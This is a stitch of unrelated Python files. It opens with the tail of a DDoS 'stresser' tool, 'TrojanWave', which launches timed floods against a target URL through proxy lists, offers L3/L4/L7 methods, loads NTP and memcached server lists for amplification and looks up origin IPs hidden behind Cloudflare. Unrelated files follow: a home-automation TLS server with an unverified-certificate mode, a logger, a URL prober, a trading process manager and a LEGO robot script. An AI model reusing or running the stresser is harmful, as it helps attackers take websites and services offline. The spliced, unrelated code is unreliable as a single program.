elif str(method.upper()) not in str(methods):
print("method not found")
exit()
timer = int(time.time()) + int(sys.argv[7])
url = str(sys.argv[2]).strip()
UrlFixer(url)
choice = str(sys.argv[3]).strip()
if choice != "4" and choice != "5" and choice != "1":
print("Socks Type Not Found [4, 5, 1]")
exit()
if choice == "4":
socks_type = 4
elif choice == "1":
socks_type = 1
else:
socks_type = 5
threads = int(sys.argv[4])
proxies = open(out_file).readlines()
if method == "slow":
conn = threads
proxydl(out_file, socks_type)
print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums)))
for _ in range(conn):
threading.Thread(target=slow, args=(conn, socks_type), daemon=True).start()
else:
multiple = str((sys.argv[6]))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
event = threading.Event()
start_attack(method, threads, event, socks_type)
event.clear()
event.set()
while True:
try:
sleep(0.1)
except KeyboardInterrupt:
break
def proxydl(out_file, socks_type):
global proxies, multiple, choice, data
ms = 1
if socks_type == 1:
socktyper = "HTTP"
if socks_type == 4:
socktyper = "SOCKS4"
if socks_type == 5:
socktyper = "SOCKS5"
print("downloading {}'s proxy plz wait".format(socktyper))
downloadsocks(choice)
proxies = open(str(out_file)).readlines()
check_list(out_file)
check_socks(ms)
bds = 0
# layer tool :||||||||||||
def toolgui():
global bds
tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n")
if bds == 0:
print('''
Tools:
''' + tos+ '''
Other:
Clear
Exit
''')
bds = 1
tool = input(socket.gethostname() + "@"+name+":~# ").lower()
if tool != "e" and (tool != "exit") and (tool != "q") and (tool != "quit") and (tool != "logout") and (
tool != "close"):
pass
else:
exit()
if tool == "cfip":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
cfip(domain)
return tools()
elif tool == "dstat":
print(tool + ": command ready")
return tools()
elif tool == "dns":
return tools()
elif tool == "check":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
check(domain)
return tools()
elif tool == "ping":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
piger(domain)
return tools()
elif tool == "info":
domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ')
piger(domain)
return tools()
elif (tool == "help") or (tool == "h") or (tool == "?"):
tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n")
print('''
Tools:
{tos}
Other:
Clear
Exit
''')
return tools()
elif (tool == "cls") or (tool == 'clear') or (tool == 'c'):
print("\033[H\033[J")
return tools()
elif not tool:
return tools()
elif " " in tool:
return tools()
elif " " in tool:
return tools()
elif " " in tool:
return tools()
elif "\n" in tool:
return tools()
elif "\r" in tool:
return tools()
else:
print(tool + ": command not found")
return tools()
def tools():
global domain, name
name = "TrojanWave"
try:
tool = sys.argv[2].lower()
if tool != "dstat":
domain = sys.argv[3]
if str('.') not in str(domain):
print('address not found')
toolgui()
if tool == "cfip":
cfip(domain)
elif tool == "dns":
print(tool + ": comming soon !")
elif tool == "check":
check(domain)
elif tool == "ping":
piger(domain)
elif tool == "dstat":
address = requests.get('http://ipinfo.io/ip', headers={"User-Agent": UserAgent, }).text
print('now please attack to {address}')
os.system('dstat')
else:
print('tool not found')
toolgui()
except IndexError:
toolgui()
def cfip(domain):
if str("http") in str(domain):
domain = domain.replace('https://', '').replace('http:', '').replace('/')
URL = "http://www.crimeflare.org:82/cgi-bin/cfsearch.cgi"
r = requests.post(URL, data={"cfS": {domain}}, headers={"User-Agent": UserAgent, }, timeout=1)
print(r.text)
def check(domain):
if str("http") not in str(domain):
domain = "http://" + domain
print('please wait ...')
r = requests.get(domain, timeout=20)
if str("50") in str(r.status_code):
die = "OFFLINE"
else:
die = "ONLINE"
print('\nstatus_code: '+r.status_code)
print('status: '+die+'\n')
def piger(siye):
if str("https") in str(siye):
domain = str(siye).replace('https', '').replace('/', '').replace(':', '')
elif str("http") in str(siye):
domain = str(siye).replace('http', '').replace('/', '').replace(':', '')
else:
domain = str(siye)
print('please wait ...')
r = pig(domain, count=5, interval=0.2)
if r.is_alive:
die = "ONLINE"
else:
die = "OFFLINE"
print('\nAddress: '+r.address)
print('Ping: '+r.avg_rtt)
print('Aceepted Packets: '+r.packets_received+'/'+r.packets_sent)
print('status: '+die+'\n')
def usgeaseets():
global metho, url, SOCKST, thr, proxylist, muli, tim, l7s, l4s, tos, ots, l3s
socks = ["1", "4", "5"]
sockst = ["socks4.txt", "socks5.txt", "http.txt"]
try:
if sys.argv[3] not in socks:
SOCKST = Choice(socks)
elif sys.argv[3]:
SOCKST = sys.argv[3]
else:
SOCKST = Choice(socks)
except:
SOCKST = Choice(socks)
if (str(SOCKST) == str('1')):
proxylist = "http.txt"
else:
proxylist = "socks{0}.txt".format(SOCKST)
try:
met = str(sys.argv[1]).upper()
if met not in list(methods):
metho = Choice(methods).lower()
elif sys.argv[1]:
metho = sys.argv[1]
else:
metho = Choice(methods).lower()
except:
metho = Choice(methods).lower()
try:
methos = metho.upper()
if (methos in l4) or (methos in l3):
url = sys.argv[2]
elif str("http") not in sys.argv[2]:
url = "https://example.ir"
elif sys.argv[2]:
url = sys.argv[2]
else:
url = "https://example.ir"
except:
url = "https://example.ir"
try:
if sys.argv[4]:
thr = sys.argv[4]
else:
thr = Intn(100, 1000)
except:
thr = Intn(10, 1000)
try:
if (sys.argv[5] not in sockst):
exit()
except IndexError:
pass
except:
print('socks type not found')
exit()
try:
if sys.argv[6]:
muli = sys.argv[6]
else:
muli = Intn(5, 100)
except:
muli = Intn(5, 100)
try:
if sys.argv[7]:
tim = sys.argv[7]
else:
tim = Intn(10, 10000)
except:
tim = Intn(10, 10000)
l4s = str(l4).replace("'", "").replace("[", "").replace("]", "")
l3s = str(l3).replace("'", "").replace("[", "").replace("]", "")
l7s = str(l7).replace("'", "").replace("[", "").replace("]", "")
tos = str(to).replace("'", "").replace("[", "").replace("]", "")
ots = str(ot).replace("'", "").replace("[", "").replace("]", "")
def usge():
usgeaseets()
print('* Coded By MH_ProDev For Better Stresser')
print('python3 {} <method> <url> <socks_type5.4.1> <threads> <proxylist> <multiple> <timer>\n'.format(sys.argv[0]))
print(' > Methods:')
print(' - L3')
print(' | {} | {} Methods'.format(l3s, len(l3)))
print(' - L4')
print(' | {} | {} Methods'.format(l4s, len(l4)))
print(' - L7')
print(' | {} | {} Methods'.format(l7s, len(l7)))
print(' - TOOLS')
print(' | {} | {} Methods'.format(tos, len(to)))
print(' - Other')
print(' | {} | {} Methods'.format(ots, len(ot)))
print(' - All {} Method \n'.format(len(methodsl)))
print(
'expmple:\n python3 {} {} {} {} {} {} {} {}'.format(sys.argv[0], metho, url, SOCKST, thr, proxylist, muli, tim))
def makefile(text):
if text == "files/":
os.mkdir(text)
elif text == "files/proxys/":
os.mkdir(text)
else:
open(text, 'w').close()
print('File: ', text)
if __name__ == '__main__':
try:
import requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re
from time import sleep
from icmplib import ping as pig
from scapy.layers.inet import TCP
from scapy.all import *
from socket import gaierror
except:
if (os.name == "nt"):
os.system('python -m pip install -r requirements.txt')
else:
os.system('python3 -m pip install -r requirements.txt')
try:
import requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re
from time import sleep
from icmplib import ping as pig
from scapy.layers.inet import TCP
from scapy.all import *
from socket import gaierror
except:
print("Error when install requirements package!")
exit()
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate",
"Accept-Encoding: gzip, deflate",
"Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Charset: iso-8859-1Accept-Encoding: gzip",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1Accept-Charset: utf-8, iso-8859-1;q=0.5",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*Accept-Language: en-US,en;q=0.5",
"Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzipAccept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Encoding: gzipAccept-Language: en-US,en;q=0.5Accept-Charset: utf-8, iso-8859-1;q=0.5,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5",
"Accept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1",
]
data = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890"
Intn = random.randint
Choice = random.choice
if not os.path.exists('files/'):
makefile('files/')
if not os.path.exists('files/proxys/'):
makefile('files/proxys/')
if not os.path.exists('files/useragent.txt'):
makefile('files/proxys/useragent.txt')
if not os.path.exists('files/ntp_servers.txt'):
makefile('files/ntp_servers.txt')
if not os.path.exists('files/memcached_servers.txt'):
makefile('files/memcached_servers.txt')
if not os.path.exists('files/referers.txt'):
makefile('files/referers.txt')
try:
with open("files/useragent.txt", "r") as f:
readuser = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/referers.txt", "r") as f:
readref = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/memcached_servers.txt", "r") as f:
memsv = str(f.readlines()).replace('\n', '').replace('\r', '')
with open("files/ntp_servers.txt", "r") as f:
ntpsv = str(f.readlines()).replace('\n', '').replace('\r', '')
UserAgent = Choice(readuser)
referers = Choice(readref)
memcached_servers = Choice(memsv)
try:
bdr = str(sys.argv[1]).lower()
if bdr == "tools":
tools()
elif bdr == "stop":
stop()
elif bdr == "help":
usge()
elif len(sys.argv) <= int(7):
usge()
else:
main()
except IndexError:
usge()
except KeyboardInterrupt:
sys.exit()
except IndexError:
usge()
|
server.py
|
#!/usr/bin/python
import socket, ssl
import json
import sys
import requests
import ConfigParser
import argparse
import threading
from avbmsg import AVBMessage
"""
This is the underlying data format that AVBMessage wraps in a header
and optionally encrypts. The various fields are as follows:
id: The numeric device id we want to interact with
action: A block that specifies the type of action and attribute data
(only used for "set" action type)
type: Type of action, currently support get/set/run
- "get" - returns information about the device
- "set" - sets the specified attributes to the specified values
- "run" - only applies to scenes
attribute: The only valid attribute is "power" for on/off type devices
JSON message format example (Client->Server):
{
"id": 1,
"action":
{
"type": "set", (Also "get", "run")
"attribute":
{
"power": 1
}
}
}
status: 0 indicates success, 1 an error, 2 simulated mode
err_str: a string indicating what failed that Alexa will dictate
id: the device id
data: data returned for a "get" action type
JSON message format example (Server->Client):
{
"status": 0,
"err_str": null,
"id": 1,
"data":
{
"status": "1",
"name": "Bedroom Outlet"
}
}
"""
def handle_msg(s, vera_ip, vera_port, msg, psk):
print 'got msg: ' + msg.dumps()
resp_data = None
# Create the message to send the response
if psk is not None:
resp = AVBMessage(encoding=AVBMessage.ENC_AES_CBC, psk=psk)
else:
resp = AVBMessage()
# Parse the received message.
data = msg.get_data()
if data == None:
print 'Failed to decode message!'
resp_data = {'status': 1, 'err_str': 'bad message format', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
# Turn message into appropriate Vera action
# Currently, we support 3 types of actions (get/set/run). Get/set apply to
# devices while run appies to scenes
obj_id = data['id']
action = data['action']['type']
if action == 'run':
vera_params = {'id':'lu_action', 'output_format':'json',
'SceneNum':str(obj_id),
'serviceId':'urn:micasaverde-com:serviceId:HomeAutomationGateway1',
'action':'RunScene'
}
elif action == 'set':
vera_params = {'id':'lu_action', 'output_format':'json',
'DeviceNum':str(obj_id),
'serviceId':'urn:upnp-org:serviceId:SwitchPower1',
'action':'SetTarget',
'newTargetValue': str(data['action']['attribute']['power'])
}
elif action == 'get':
vera_params = {'id':'status'}
else:
print 'invalid action'
resp_data = {'status': 1, 'err_str': 'invalid action', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
if vera_ip is not None:
# Send the appropriate HTTP request to Vera
dest = 'http://' + vera_ip + ':' + vera_port + '/data_request'
print
print 'sending to: ' + dest
print 'params: ' + str(vera_params)
print
try:
r = requests.get(dest, params=vera_params)
except requests.exceptions.RequestException as e:
print e
resp_data = {'status': 2, 'err_str': 'requests exception', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
if r.status_code != 200:
print 'Non-200 response from Vera'
print 'Code: ' + str(r.status_code)
resp_data = {'status': 2, 'err_str': 'bad response from Vera', 'data': None}
resp.set_data(resp_data)
s.sendall(resp.dumps())
return False
# Get the returned JSON from Vera (only for 'get' action)
if action == 'get':
status = r.json()
verastate = 'unknown'
veraname = 'unknown'
for dev in status['devices']:
if dev['id'] == obj_id:
for state in dev['states']:
if state['variable'] == 'Status':
verastate = state['value']
if state['variable'] == 'ConfiguredName':
veraname = state['value']
resp_data = {'status': 0, 'err_str': None, 'data': {'status':verastate, 'name':veraname}}
else:
resp_data = {'status': 0, 'err_str': None, 'data': None}
# Send the response
resp.set_data(resp_data)
print 'sending: ' + resp.dumps()
s.sendall(resp.dumps())
else:
# Send the simulated response (echo received data back)
resp_data = {'status': 2, 'err_str': 'vera simulation', 'data': data}
resp.set_data(resp_data)
print 'sending: ' + resp.dumps()
s.sendall(resp.dumps())
return True
# Entry point for new thread to handle specific client connection
def client_thread(secure_s, ip, port, psk):
if psk is not None:
m = AVBMessage(encoding=AVBMessage.ENC_AES_CBC, psk=psk)
else:
m = AVBMessage()
# Set the socket timeout. This will prevent a client from opening a connection
# and just sitting there, consuming resources. If no message is received within
# the timeout then an exception is raised and the thread will terminate
secure_s.settimeout(5.0)
while True:
# Get a new message header
chunks = []
nb = 0
while nb < AVBMessage.HEADER_SIZE:
try:
chunk = secure_s.recv(AVBMessage.HEADER_SIZE - nb)
except (socket.timeout, ssl.SSLError) as e:
print 'recv error: ' + str(e)
# Note that we issue a shutdown() here to notify the other end
# that we're closing the connection. If we just close the recv()
# on the client will just wait forever
secure_s.shutdown(socket.SHUT_RDWR)
secure_s.close()
return
if chunk == '':
print 'connection broken or closed by client'
secure_s.close()
return
chunks.append(chunk)
nb += len(chunk)
msg = ''.join(chunks)
# Get the length and wait for the rest
m.loads(msg)
while nb < m.len():
try:
chunk = secure_s.recv(min(m.len() - nb, 1024))
except (socket.timeout, ssl.SSLError) as e:
print 'recv error: ' + str(e)
secure_s.shutdown(socket.SHUT_RDWR)
secure_s.close()
return
if chunk == '':
print 'connection broken or closed by client'
secure_s.close()
return
chunks.append(chunk)
nb += len(chunk)
msg = ''.join(chunks)
# Handle the message
# Pass in IP address and port of vera (as strings). These are used to form
# the URL to send the request to Vera.
m.loads(msg)
if not handle_msg(secure_s, ip, str(port), m, psk):
print 'error handling message, server closing connection'
secure_s.close()
return
def main():
# Read the configuration file
cfg = ConfigParser.RawConfigParser()
# If the user provides a file use that, otherwise use the default
parser = argparse.ArgumentParser()
parser.add_argument('--config', help='path to server config file')
parser.add_argument('--no-vera', action='store_true', help='switch to not send anything to Vera')
args = parser.parse_args()
cfg_file = './server.cfg'
if args.config is not None:
cfg_file = args.config
try:
cfg.readfp( open(cfg_file) )
except:
print 'error reading configuration file: ' + cfg_file
sys.exit()
# Setup the defaults
port = 3000
vera_port = 3480
# Make sure we have the required sections in the config file
if cfg.has_section('vera'):
if cfg.has_option('vera', 'ip'):
vera_ip = cfg.get('vera', 'ip')
else:
print 'missing Vera IP address'
sys.exit()
if cfg.has_option('vera', 'port'):
vera_port = cfg.getint('vera', 'port')
else:
print 'missing [vera] section in configuration file'
sys.exit()
if cfg.has_option('server', 'port'):
port = cfg.getint('server', 'port')
# See what security options are specified in the config file
# Valid combinations are:
# 1) none - just do regular connection (INSECURE)
# 2) just the section - use ssl/tls but with no auth
# 3) root_ca plus client cert/key- give out certificate to client
# Optionally, if psk is specified then we will use it to encrypt the message body
security = 'none'
psk = None
if cfg.has_section('security'):
security = 'ssl'
if cfg.has_option('security', 'root_ca') and cfg.has_option('security', 'cert') and cfg.has_option('security', 'key'):
security = 'ssl_mutual_auth'
root_ca = cfg.get('security', 'root_ca')
cert = cfg.get('security', 'cert')
key = cfg.get('security', 'key')
if cfg.has_option('security', 'psk'):
try:
f = open(cfg.get('security', 'psk'), 'r')
# Note that the newline gets read, so we need to strip it
psk = f.read().rstrip('\n')
f.close()
except IOError as e:
print 'I/O error({0}): {1}'.format(e.errno, e.strerror)
psk = None
print ('configuring server security profile as "' + security + '"')
if psk is not None:
print ('using PSK from ' + cfg.get('security', 'psk'))
# Open up the port and listen for connections
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to the port
print 'starting server on ' + socket.gethostname() + ':' + str(port)
print
# Do some error checking as binds can fail if the port is being used by
# someone else
try:
s.bind(('', port))
except socket.error as msg:
print 'socket bind() failed!'
print '(err ' + str(msg[0]) + '): ' + msg[1]
sys.exit()
# start listening (with max 5 connections queued)
s.listen(5)
# Setup the SSL context based on assets provided in the config file
if security == 'none':
# No need to create an SSL context
pass
elif security == 'ssl':
# Setting recommended for max compatibility. Note however that SSLv2
# and v3 are not considered secure.
# See: https://docs.python.org/2/library/ssl.html
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.set_ciphers('HIGH')
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
elif security == 'ssl_mutual_auth':
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_verify_locations(root_ca)
context.verify_mode = ssl.CERT_REQUIRED
context.load_cert_chain(certfile=cert, keyfile=key)
# If the switch to turn off Vera communication was specified we will
# overwrite the vera_ip with None
if args.no_vera:
print 'Vera communication disabled.'
vera_ip = None
# Now that the server is listening, we can enter our main loop where we
# wait for connections
while True:
print 'waiting for connection...'
# accept() will block until a client has tried to connect
(new_s, addr) = s.accept()
print 'connection from ' + addr[0] + ':' + str(addr[1])
# Wrap the socket in our SSL context to protect communications
if security == 'none':
secure_s = new_s
else:
secure_s = context.wrap_socket(new_s, server_side=True)
# Kick off a thread to handle the new client
t = threading.Thread(target=client_thread, args=(secure_s, vera_ip, vera_port, psk,))
t.start()
if __name__ == '__main__':
main()
|
logger.py
|
import time, datetime, pytz
import threading
class Logger(object):
@staticmethod
def log(text: str):
threading.Thread(target=Logger._logtask,args=(text,)).start()
@staticmethod
def _logtask(text: str):
t = '[ '+ datetime.datetime.now(pytz.timezone('Europe/Warsaw')).strftime("%Y-%m-%d %H:%M:%S")+' ] '
print(t+str(text))
|
webprobe.py
|
import threading
import requests
import argparse
from time import sleep
"""ArgParse for CLI input"""
parser=argparse.ArgumentParser(description='WebProbe V0.1')
parser.add_argument('-f','--filename',type=str,required=True,help="Specify filename.")
parser.add_argument('-t','--threads',type=int,const=5,nargs='?',help="Specify No.of threads to spawn (default = 5)")
args = parser.parse_args()
"""Supressing warning caused by requests"""
requests.packages.urllib3.disable_warnings()
def do_request(url):
""" Post request to the site
print the url to console if response is 200
"""
if not url: return
try:
response = requests.get(url, verify=False, allow_redirects=False, timeout=1)
print(url) #if response.ok else print(f"response: {response.status_code} url: {url}")
except Exception as e:
pass
def process_file(fname, t):
""" Thread Implementation """
fp = open(fname,'rt')
arr = list(map(lambda a : a.strip(), fp.readlines()))
for each in arr:
req = threading.Thread(target=do_request, args=(each,))
#print(threading.active_count())
while threading.active_count() >=t:
sleep(0.1)
# Needs to be changed
req.start()
fp.close()
if __name__=="__main__":
try:
if args.threads == None:
threads_c=5
else:
threads_c=args.threads
#print(15*"="+"\nFile Name : {}\nThread Count : {}\n".format(args.filename,threads_c)+15*"="+"\n")
process_file(args.filename, threads_c)
except Exception as err:
print("\33[031mError !!\33[0m\n \n{}".format(err))
|
hickey.py
|
import os
import platform
from multiprocessing import Process
from datetime import datetime
from inspect import isfunction
from time import sleep
now = datetime.now()
def auth_time(current):
if (current - now).seconds < 10:
return True
elif 10 <= (current - now).seconds <= 20:
return False
elif (current - now).seconds > 20:
return True
def run_all_app(app_func):
app_func()
def printme():
while True:
print("I AM RUNNING STRATEGY")
sleep(1)
def start_all(app_func, info=True, interface="ctp", in_front=300):
"""
开始进程管理
* app_func: 创建app的函数
* interface: 接口名字
* in_front: 相较于开盘提前多少秒进行运行登陆.单位: seconds
"""
print("""
Ctpbee 7*24 Manager started !
Warning: program will automatic start at trade time ....
Hope you will have a good profit ^_^
""")
if not isfunction(app_func):
raise TypeError(f"请检查你传入的app_func是否是创建app的函数, 而不是{type(app_func)}")
p = None
while True:
current = datetime.now()
status = auth_time(current)
print(f"time: {current} auth status: {status}")
if p is None and status:
p = Process(target=run_all_app, args=(app_func,), daemon=True)
p.start()
print(f"program start successful, pid: {p.pid}")
if not status and p is not None:
print(f"invalid time, 查杀子进程 pid: {p.pid}")
if platform.uname().system == "Windows":
os.popen('taskkill /F /pid ' + str(p.pid))
else:
import signal
os.kill(p.pid, signal.SIGKILL)
p = None
sleep(1)
if __name__ == '__main__':
start_all(printme)
|
Main.py
|
#!/usr/bin/env python3
print("Inicializando...", end=' \r')
import time
# from ev3dev.ev3 import *
print("ev3dev.ev3", end=' \r')
from ev3dev2.motor import OUTPUT_A, OUTPUT_B, MoveTank, SpeedPercent
print("motores importados", end=' \r')
from ev3dev2.sensor.lego import ColorSensor,UltrasonicSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3
print("Sensores importados", end=' \r')
from threading import Thread
from math import sqrt
import pickle
print("threading, math e pickle importados", end=' \r')
time.sleep(1)
print("Importacoes concluidas!", end=' \r')
#DECLARAÇÃO DE VARIAVEIS GLOBAIS
rodas=MoveTank(OUTPUT_A,OUTPUT_B)
quads = []
orientacao = 0
memoria_cor= {}
cor_atual=""
tentativa=0
start_time=0
c=""
mochila=0
cores = pickle.load(open("Cores.p", "rb"))
Sensor_direita = ColorSensor(INPUT_2)
Sensor_esquerda = ColorSensor(INPUT_1)
Sensor_direita.mode = Sensor_direita.MODE_RGB_RAW
Sensor_esquerda.mode = Sensor_esquerda.MODE_RGB_RAW
Sensor_sonic = UltrasonicSensor(INPUT_3)
Sensor_sonic.mode=Sensor_sonic.MODE_US_DIST_CM
print("Declarando tudo!", end=' \r')
#FUNÇÔES DE LOCOMOÇÂO
def retorno(t):#função para o retorno
global tentativa,start_time,c,cor_atual
#print ('viu preto')
while c!=cor_atual:
rodas.on(15,15)
if c== cor_atual: Confirmar_cor(c)
rodas.off
time.sleep(0.2)#tempo para a parada no meio do quadrado
rodas.on_for_seconds(15,15,0.6)
rodas.off()
#rodas.on_for_seconds(20,20,t)#volta até o ultimo ponto de referencia
tentativa+=1#indica que foi feita uma tentativa que falhou
cor=c
procurar_proximo()#vira conforme as orientações que são possiveis
start_time = time.time()#reseta o timer
alinha(0.02,230,30)#anda um pouco a frente para nao o robo não reconhecer o mesmo ponto de referencia como um novo ponto
def sair_da_cor_atual():#TROCAR PELO ALINHAMENTO
global c
while c!='White':
rodas.on(-20,-20)
rodas.off()
def alinha(Kp,target,margem):
global e,d
erroE=1
erroD=1
#rodas.on_for_seconds(-20,-20,0.8)
if c == 'White':
while c=='White':
rodas.on(15,15)
rodas.off()
else:
while c!='White':
rodas.on(-15,-15)
rodas.off()
while(erroE != 0 or erroD != 0) :
atualD = d[0]+d[1]+d[2]
erroD=atualD - target
if abs(erroD)<margem:
erroD=0
outputD = erroD* Kp
atualE = Sensor_esquerda.rgb[0]+Sensor_esquerda.rgb[1]+Sensor_esquerda.rgb[2]
erroE=atualE - target
if abs(erroE)<margem:
erroE=0
outputE = erroE* Kp
if outputE>40:
outputE = 40
elif outputE<-40:
outputE=-40
if outputD>40:
outputD = 40
if erroE == 0 and erroD == 0:
rodas.off()
else:
rodas.on(outputE,outputD)
# while c!='White':
# rodas.on(-20,-20)
# rodas.off()
def andar_frente():#Corrigir todos os tempos presentes aqui a fim de utilizar com o robo e pista finais
global cor_atual,start_time,quads,c
#Vai para frente até ver Black, retorna o tempo percorrido
while 1:
if(c=="Black"):
rodas.off()
return (time.time()-start_time)#ACERTAR ESTE CALCULO PARA A CONTAGEM COMEÇAR DO MEIO DO QUADRADO COLORIDO
elif c!="White" and c!="Black" and start_time != 0:
if(Confirmar_cor(c)):
verificar_plaza()
rodas.off()
return (time.time()-start_time)#se achar branco/cor de indicação retorna o tempo entre os pontos e para de andar
elif c!="White" and c!="Black" and start_time==0:
cor_atual=c
#print(cor_atual)
time.sleep(2.15)
procurar_proximo()#vira se ver branco, começa o timer e continua a andar para frente
start_time = time.time()
alinha(0.02,230,30)
#alinhar (lembrar de descontar o tempo de alinhamento na variavel start_time)
while c=='White':
#Anda pelo branco em procura do boneco se a mochila nao esta carregada(mochila==0).Senão apenas anda para frente no branco
procurar_passageiro()
def virar(graus):#função de virada relativa a posiçao
if graus<0:
rodas.on_for_seconds(-50,50,abs(graus)*(0.40/90))
elif(graus==0): pass
else:
rodas.on_for_seconds(50,-50,abs(graus)*(0.40/90))
def procurar_proximo():#função de virar conforme o aprendido, ou a falta dele
global tentativa,cor_atual,orientacao
if (cor_atual not in memoria_cor.keys()):
if (90 not in memoria_cor.values() and tentativa == 0):
#print ('tentativa0')
virar(90)
orientacao = 90
if(90 in memoria_cor.values()):
tentativa=1
if (0 not in memoria_cor.values() and tentativa == 1):
virar(-90)
#print ('tentativa1')
orientacao = 0
if(0 in memoria_cor.values() and 90 not in memoria_cor.values() and tentativa==1):
tentativa=2
virar(-90)
if (-90 not in memoria_cor.values() and tentativa == 2):
#print ('tentativa2')
virar(-90)
orientacao = -90
else:
virar(memoria_cor[cor_atual])
#FIM DAS FUNÇÔES DE LOCOMOÇÂO
#FUNÇÕES DE COR
def media(leitura1, leitura2): # FAZ A MÈDIA DAS LEITURAS DOS AMBOS SENSORES, NÂO USAR NO ALINHAMENTO
media = []
for x in range(3):
media.append((leitura1[x]+leitura2[x])/2)
return tuple(media)
def cor_mais_proxima(leitura):
global cores
min = 1000
for valor in cores.values():
# DISTANCIA EUCLIDIANA DO VALOR DA LEITURA DO SENSOR QUE FOI USADO COMO ENTRADA COM OS VALORES DAS CORES CALIBRADAS PREVIAMENTE
dist = sqrt(((leitura[0]-valor[0])**2) +
((leitura[1]-valor[1])**2)+((leitura[2]-valor[2])**2))
if(dist < min): # verifica se é menor que o ultimo verificado
min = dist
for key, value in cores.items(): # pega o nome da cor que gerou a menor distancia
if value == valor:
cor = key
return cor
def diferente_de(*cor):
global c
if c not in cor:
return 1
else: return 0
def cor_th():
global c,e,d
while(1):
c=cor_mais_proxima(Sensor_direita.rgb)
d=Sensor_direita.rgb
c=cor_mais_proxima(Sensor_direita.rgb)
c=cor_mais_proxima(Sensor_direita.rgb)
def Confirmar_cor(cor_vista):
global c
time.sleep(0.08)
if(c==cor_vista):return True
else:return False
#FIM DAS FUNÇÕES DE COR
#FUNÇÕES DO PLAZA
def verificar_plaza():
global c,mochila
if c!='Black':
mudanca = 0
cor_momento = c
goiaba = Thread(target=rodas.on_for_seconds, args=(-15, -15, 2.17,))
goiaba.start()
while(goiaba.is_alive()):
if (cor_momento != c):
mudanca += 1
cor_momento = c
if(mudanca >= 3):
tempo=time.time()
while(c!='Black'):
rodas.on(-20,-20)
rodas.off()
time.sleep(3)#deixa o BONECO
mochila=0
rodas.on_for_seconds(20,20,(tempo-time.time()))
virar(180)
Volta()
# print("PLAZA")
else:pass
# print(" NAO PLAZA")
goiaba.join()
rodas.off()
def volta():
global quads,mochila
i=len(quads)-1
while(i>0 and mochila==0):
virar(memoria_cor[quads[i].cor]*-1)
alinha()
procurar_passageiro()
time.sleep(2.17)
if(mochila==1 ):
virar(180)
while(c!=White):rodas.on(-20,-20)
rodas.off()
break
i-=1
#alinhar
#if sensor detectar algo retorna start_time e execute a função de pegar o boneco
if(i==0):virar(180)
rodas.off()
#FIM DAS FUNÇÕES DO PLAZA
#FUNÇÕES DA MOCHILA(EQUIPAMENTO DE CAPTURAR BONECO)
def procurar_passageiro():
global mochila,c
while c == 'White':
rodas.on(-15,-15)
if Sensor_sonic.distance_centimeters<25 and mochila==0:
time.sleep(0.3)#regular para o robo parar com seu centro de giro alinhado com o boneco detectado
rodas.off()
dist=Sensor_sonic.distance_centimeters
virar(90)
rodas.on_for_seconds(-20,-20,dist*0.048)#regular o valor de forma ao robo pegar o boneco
time.sleep(1)
mochila=1
rodas.on_for_seconds(20,20,dist*0.048)
virar(-90)
rodas.off()
#FIM DAS FUNÇÕES DE MOCHILA
#FUNÇÕES DE INFORMAÇÃO
class quad:#objeto que guarda informações do ponto de referencia encontrado
def __init__(self,cor,tempo,orientacao):
self.cor = cor
self.tempo = tempo
self.orientacao=orientacao
#FIM DAS FUNÇÕES DE INFORMAÇÃO
print("Vamos comecar!", end=' \r')
if __name__=="__main__":
start_time=0
# _thread.start_new_thread(cor_th)
ver_cor = Thread(target=cor_th)
ver_cor.daemon=True
ver_cor.start()
